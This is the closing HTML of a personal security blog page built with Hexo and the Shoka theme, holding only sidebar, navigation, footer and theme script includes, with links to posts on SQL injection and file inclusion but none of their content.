class="toc-link" href="#%E5%BE%85%E7%9C%8B%E8%B5%84%E6%96%99"><span class="toc-number">7.</span> <span class="toc-text">待看资料</span></a></li></ol>
      </div>
      <div class="related panel pjax" data-title="Related">
        <ul>
          <li><a href="/2020/10/23/sql%E6%B3%A8%E5%85%A5/" rel="bookmark" title="sql注入">sql注入</a></li><li class="active"><a href="/2020/10/19/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="bookmark" title="文件包含">文件包含</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="Overview">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="1ss4k"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">1ss4k</p>
  <div class="description" itemprop="description"></div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">3</span>
        <span class="name">posts</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">2</span>
        <span class="name">categories</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">5</span>
        <span class="name">tags</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL3lvdXJuYW1l" title="https:&#x2F;&#x2F;github.com&#x2F;yourname"><i class="ic i-github"></i></span>
      <span class="exturl item twitter" data-url="aHR0cHM6Ly90d2l0dGVyLmNvbS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;twitter.com&#x2F;yourname"><i class="ic i-twitter"></i></span>
      <span class="exturl item zhihu" data-url="aHR0cHM6Ly93d3cuemhpaHUuY29tL3Blb3BsZS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;www.zhihu.com&#x2F;people&#x2F;yourname"><i class="ic i-zhihu"></i></span>
      <span class="exturl item music" data-url="aHR0cHM6Ly9tdXNpYy4xNjMuY29tLyMvdXNlci9ob21lP2lkPXlvdXJpZA==" title="https:&#x2F;&#x2F;music.163.com&#x2F;#&#x2F;user&#x2F;home?id&#x3D;yourid"><i class="ic i-cloud-music"></i></span>
      <span class="exturl item weibo" data-url="aHR0cHM6Ly93ZWliby5jb20veW91cm5hbWU=" title="https:&#x2F;&#x2F;weibo.com&#x2F;yourname"><i class="ic i-weibo"></i></span>
      <span class="exturl item about" data-url="aHR0cHM6Ly9hYm91dC5tZS95b3VybmFtZQ==" title="https:&#x2F;&#x2F;about.me&#x2F;yourname"><i class="ic i-address-card"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>Home</a>
  </li>

        
  <li class="item dropdown">
    <a href="javascript:void(0);"><i class="ic i-feather"></i>Posts</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>Archives</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>Categories</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>Tags</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>Random Posts</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web/" title="In web">web</a>
</div>

    <span><a href="/2020/10/19/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" title="文件包含">文件包含</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/web/" title="In web">web</a>
</div>

    <span><a href="/2020/10/23/sql%E6%B3%A8%E5%85%A5/" title="sql注入">sql注入</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/paper%E7%AC%94%E8%AE%B0/" title="In paper笔记">paper笔记</a>
</div>

    <span><a href="/2020/10/20/%E5%9C%A8%E9%BB%91%E6%9A%97%E4%B8%AD%E6%8A%95%E6%8E%B7%E9%A3%9E%E9%95%96%EF%BC%9F/" title="机器学习_在黑暗中投掷飞镖？">机器学习_在黑暗中投掷飞镖？</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>Recent Comments</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2020</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">1ss4k @ Yume Shoka</span>
  </div>
  <div class="powered-by">
    Powered by <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2020/10/19/文件包含/',
    favicon: {
      show: "（●´3｀●）Goooood",
      hide: "(´Д｀)Booooom"
    },
    search : {
      placeholder: "Search for Posts",
      empty: "We didn't find any results for the search: ${query}",
      stats: "${hits} results found in ${time} ms"
    },
    valine: true,fancybox: true,copyright: 'Copied to clipboard successfully! <br> All articles in this blog are licensed under <i class="ic i-creative-commons"></i>BY-NC-SA.',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.3"></script>




</body>
</html>
